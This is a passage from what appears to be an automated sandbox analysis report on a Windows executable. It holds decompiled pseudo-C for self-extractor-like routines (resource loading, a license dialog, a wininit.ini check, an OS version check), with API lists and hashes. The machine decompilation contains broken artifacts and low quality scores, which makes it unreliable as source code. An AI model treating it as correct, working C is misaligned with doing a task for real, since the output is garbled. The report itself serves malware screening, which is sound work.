                                                                                                                                                                                                    					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                    						_t72 = _t63 - _t56;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t72 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                                                    					_t63 = _v60;
                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                    			}
























                                                                                                                                                                                                    0x003943d0
                                                                                                                                                                                                    0x003943d8
                                                                                                                                                                                                    0x003943df
                                                                                                                                                                                                    0x003943e6
                                                                                                                                                                                                    0x003943ec
                                                                                                                                                                                                    0x003943f1
                                                                                                                                                                                                    0x00394400
                                                                                                                                                                                                    0x00394403
                                                                                                                                                                                                    0x0039440b
                                                                                                                                                                                                    0x00394420
                                                                                                                                                                                                    0x00394429
                                                                                                                                                                                                    0x00394437
                                                                                                                                                                                                    0x00394444
                                                                                                                                                                                                    0x00394447
                                                                                                                                                                                                    0x0039444d
                                                                                                                                                                                                    0x00394454
                                                                                                                                                                                                    0x0039445b
                                                                                                                                                                                                    0x00394460
                                                                                                                                                                                                    0x00394461
                                                                                                                                                                                                    0x00394467
                                                                                                                                                                                                    0x0039446f
                                                                                                                                                                                                    0x00394473
                                                                                                                                                                                                    0x00394473
                                                                                                                                                                                                    0x00394463
                                                                                                                                                                                                    0x00394463
                                                                                                                                                                                                    0x00394463
                                                                                                                                                                                                    0x0039447a
                                                                                                                                                                                                    0x00394481
                                                                                                                                                                                                    0x00394484
                                                                                                                                                                                                    0x0039448a
                                                                                                                                                                                                    0x00394492
                                                                                                                                                                                                    0x00394496
                                                                                                                                                                                                    0x00394496
                                                                                                                                                                                                    0x00394486
                                                                                                                                                                                                    0x00394486
                                                                                                                                                                                                    0x00394486
                                                                                                                                                                                                    0x003944b8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003943F1
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0039440B
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00394423
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0039442E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0039443A
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00394447
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003944A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                    • Opcode ID: 198b3ee906333cf4a4780e7f7bc8607732d3058d2bf09bf958337749ab335e5c
                                                                                                                                                                                                    • Instruction ID: 7fd7a6fed4c8ca4792a58ba5570bc0f5127ea893a314b5ebb96036a7bd0b4674
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 198b3ee906333cf4a4780e7f7bc8607732d3058d2bf09bf958337749ab335e5c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B314F71E00519AFCF15CFB9DD49DEEBBB9EB89310F154269F805B3250DA31AC058BA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                    			E00396298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t16 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                    				E0039171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                    						 *0x399124 = 0x80070714;
                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t26 =  *_t40;
                                                                                                                                                                                                    							_t40 = _t40 + 1;
                                                                                                                                                                                                    						} while (_t26 != 0);
                                                                                                                                                                                                    						_t41 = _t40 - _t47;
                                                                                                                                                                                                    						_t46 = _t51;
                                                                                                                                                                                                    						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                    						 *0x39a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                    						_t30 = _v32();
                                                                                                                                                                                                    						if(_t51 != _t51) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(_t45);
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							_t36 = 0;
                                                                                                                                                                                                    							FreeResource(??);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							FreeResource();
                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                    							E0039171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                    							_t46 = 0;
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					return E00396CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}






















                                                                                                                                                                                                    0x00396298
                                                                                                                                                                                                    0x003962a0
                                                                                                                                                                                                    0x003962a7
                                                                                                                                                                                                    0x003962ad
                                                                                                                                                                                                    0x003962af
                                                                                                                                                                                                    0x003962bb
                                                                                                                                                                                                    0x003962c3
                                                                                                                                                                                                    0x003962c4
                                                                                                                                                                                                    0x0039633b
                                                                                                                                                                                                    0x0039633b
                                                                                                                                                                                                    0x00396345
                                                                                                                                                                                                    0x0039634d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003962da
                                                                                                                                                                                                    0x003962de
                                                                                                                                                                                                    0x0039635f
                                                                                                                                                                                                    0x00396369
                                                                                                                                                                                                    0x003962e0
                                                                                                                                                                                                    0x003962e0
                                                                                                                                                                                                    0x003962e0
                                                                                                                                                                                                    0x003962e3
                                                                                                                                                                                                    0x003962e5
                                                                                                                                                                                                    0x003962e5
                                                                                                                                                                                                    0x003962e8
                                                                                                                                                                                                    0x003962e8
                                                                                                                                                                                                    0x003962ea
                                                                                                                                                                                                    0x003962eb
                                                                                                                                                                                                    0x003962ef
                                                                                                                                                                                                    0x003962f1
                                                                                                                                                                                                    0x003962f3
                                                                                                                                                                                                    0x00396302
                                                                                                                                                                                                    0x00396308
                                                                                                                                                                                                    0x0039630d
                                                                                                                                                                                                    0x00396314
                                                                                                                                                                                                    0x00396314
                                                                                                                                                                                                    0x00396316
                                                                                                                                                                                                    0x00396319
                                                                                                                                                                                                    0x00396355
                                                                                                                                                                                                    0x00396357
                                                                                                                                                                                                    0x0039631b
                                                                                                                                                                                                    0x0039631b
                                                                                                                                                                                                    0x00396331
                                                                                                                                                                                                    0x00396334
                                                                                                                                                                                                    0x00396339
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396339
                                                                                                                                                                                                    0x00396319
                                                                                                                                                                                                    0x0039636b
                                                                                                                                                                                                    0x0039637d
                                                                                                                                                                                                    0x0039637d
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039171E: _vsnprintf.MSVCRT ref: 00391750
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003951CA,00000004,00000024,00392F71,?,00000002,00000000), ref: 003962CD
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003951CA,00000004,00000024,00392F71,?,00000002,00000000), ref: 003962D4
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003951CA,00000004,00000024,00392F71,?,00000002,00000000), ref: 0039631B
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00396345
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003951CA,00000004,00000024,00392F71,?,00000002,00000000), ref: 00396357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                    • Opcode ID: 64a2806a25be408abfda5e31e81f3133546761cf59f65571c0791f92baba121f
                                                                                                                                                                                                    • Instruction ID: d33862e1e913c70cb37331f035d2746e1a7e14c7098fb916b2d08f8487c66427
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64a2806a25be408abfda5e31e81f3133546761cf59f65571c0791f92baba121f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D21F875A01619ABDF139F649C869FF7B7CFB48710F01021AF902A3251DB369D018BE0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00393A3F(void* __eflags) {
                                                                                                                                                                                                    				void* _t3;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t16 = "LICENSE";
                                                                                                                                                                                                    				_t1 = E0039468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                    				 *0x398d4c = _t3;
                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                    					_t19 = _t16;
                                                                                                                                                                                                    					if(E0039468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA( *0x398d4c, "<None>") == 0) {
                                                                                                                                                                                                    							LocalFree( *0x398d4c);
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x399124 = 0;
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t9 = E00396517(_t19, 0x7d1, 0, E00393100, 0, 0);
                                                                                                                                                                                                    						LocalFree( *0x398d4c);
                                                                                                                                                                                                    						if(_t9 != 0) {
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x399124 = 0x800704c7;
                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree( *0x398d4c);
                                                                                                                                                                                                    					 *0x399124 = 0x80070714;
                                                                                                                                                                                                    					goto L2;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0x399124 = E00396285();
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x00393a46
                                                                                                                                                                                                    0x00393a57
                                                                                                                                                                                                    0x00393a5d
                                                                                                                                                                                                    0x00393a63
                                                                                                                                                                                                    0x00393a6a
                                                                                                                                                                                                    0x00393a91
                                                                                                                                                                                                    0x00393a9a
                                                                                                                                                                                                    0x00393ad8
                                                                                                                                                                                                    0x00393b13
                                                                                                                                                                                                    0x00393b19
                                                                                                                                                                                                    0x00393b1b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393b21
                                                                                                                                                                                                    0x00393ae7
                                                                                                                                                                                                    0x00393af4
                                                                                                                                                                                                    0x00393afc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393afe
                                                                                                                                                                                                    0x00393a87
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393a87
                                                                                                                                                                                                    0x00393aa8
                                                                                                                                                                                                    0x00393ab3
                                                                                                                                                                                                    0x00393ab9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393ab9
                                                                                                                                                                                                    0x00393a78
                                                                                                                                                                                                    0x00393a82
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00392F64,?,00000002,00000000), ref: 00393A5D
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00393AB3
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                      • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00393AD0
                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00393B13
                                                                                                                                                                                                      • Part of subcall function 00396517: FindResourceA.KERNEL32(00390000,000007D6,00000005), ref: 0039652A
                                                                                                                                                                                                      • Part of subcall function 00396517: LoadResource.KERNEL32(00390000,00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00396538
                                                                                                                                                                                                      • Part of subcall function 00396517: DialogBoxIndirectParamA.USER32(00390000,00000000,00000547,003919E0,00000000), ref: 00396557
                                                                                                                                                                                                      • Part of subcall function 00396517: FreeResource.KERNEL32(00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00396560
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00393100,00000000,00000000), ref: 00393AF4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                    • Opcode ID: 34369b1e372b95d1b7e1b6d3951e96f7f16fbfbb595b9db159ef42028acc7d78
                                                                                                                                                                                                    • Instruction ID: c9c5be61231250d55fd398db4fb71a4107956f5c958cd230411b7272a6571b85
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34369b1e372b95d1b7e1b6d3951e96f7f16fbfbb595b9db159ef42028acc7d78
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C11B9B1301201ABDF23AF369C09F1B79BDEBDA700F11452FB545DA6F1DA7B88018664
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E003924E0(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t7;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                    				_t7 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                    				_t25 = 0x104;
                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					E0039658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                    					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                    					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                    						_lclose(_t25);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x003924e0
                                                                                                                                                                                                    0x003924eb
                                                                                                                                                                                                    0x003924f2
                                                                                                                                                                                                    0x003924f7
                                                                                                                                                                                                    0x00392504
                                                                                                                                                                                                    0x0039250e
                                                                                                                                                                                                    0x0039251d
                                                                                                                                                                                                    0x0039252c
                                                                                                                                                                                                    0x00392541
                                                                                                                                                                                                    0x00392546
                                                                                                                                                                                                    0x00392553
                                                                                                                                                                                                    0x00392555
                                                                                                                                                                                                    0x00392555
                                                                                                                                                                                                    0x00392546
                                                                                                                                                                                                    0x0039256c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00392506
                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0039252C
                                                                                                                                                                                                    • _lopen.KERNEL32 ref: 0039253B
                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0039254C
                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00392555
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                    • Opcode ID: 6f160ced5fda0d868d4e4a597ddef5afc2c9eea207993bf751bbbc3609dc5d42
                                                                                                                                                                                                    • Instruction ID: e50e1c0d069c2f7eedaa01566e19e800094c3f7e6e9845d38a980fa4a682acbd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f160ced5fda0d868d4e4a597ddef5afc2c9eea207993bf751bbbc3609dc5d42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E30188326015186BCB22AB65DC0DEDFBB7CDB86750F010256FA49D3290DE758E45CAD1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E003936EE(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                    				CHAR* _v428;
                                                                                                                                                                                                    				CHAR* _v432;
                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                    				CHAR* _v440;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                    				CHAR* _t77;
                                                                                                                                                                                                    				CHAR* _t91;
                                                                                                                                                                                                    				CHAR* _t94;
                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                    				CHAR* _t98;
                                                                                                                                                                                                    				signed char _t99;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				signed short _t107;
                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                    				short _t113;
                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                    				signed char _t115;
                                                                                                                                                                                                    				short _t119;
                                                                                                                                                                                                    				CHAR* _t123;
                                                                                                                                                                                                    				CHAR* _t124;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                    				signed int _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				CHAR* _t138;
                                                                                                                                                                                                    				signed int _t139;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t72 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                    				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    				_t115 = __ecx;
                                                                                                                                                                                                    				_t135 = 0;
                                                                                                                                                                                                    				_v432 = __ecx;
                                                                                                                                                                                                    				_t138 = 0;
                                                                                                                                                                                                    				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                    					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                    					_t119 = 2;
                                                                                                                                                                                                    					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                    					__eflags = _t77;
                                                                                                                                                                                                    					if(_t77 == 0) {
                                                                                                                                                                                                    						_t119 = 0;
                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                    						 *0x398184 = 1;
                                                                                                                                                                                                    						 *0x398180 = 1;
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						 *0x399a40 = _t119;
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						__eflags =  *0x398a34 - _t138; // 0x0
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                                                                    						if(_t115 == 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v428 = _t135;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                    						_t11 =  &_v420;
                                                                                                                                                                                                    						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                    						__eflags =  *_t11;
                                                                                                                                                                                                    						_v440 = _t115;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_v424 = _t135 * 0x18;
                                                                                                                                                                                                    							_v436 = E00392A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                    							_t91 = E00392A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                    							_t123 = _v436;
                                                                                                                                                                                                    							_t133 = 0x54d;
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 < 0) {
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								__eflags = _v420 - 1;
                                                                                                                                                                                                    								if(_v420 == 1) {
                                                                                                                                                                                                    									_t138 = 0x54c;
                                                                                                                                                                                                    									L36:
                                                                                                                                                                                                    									__eflags = _t138;
                                                                                                                                                                                                    									if(_t138 != 0) {
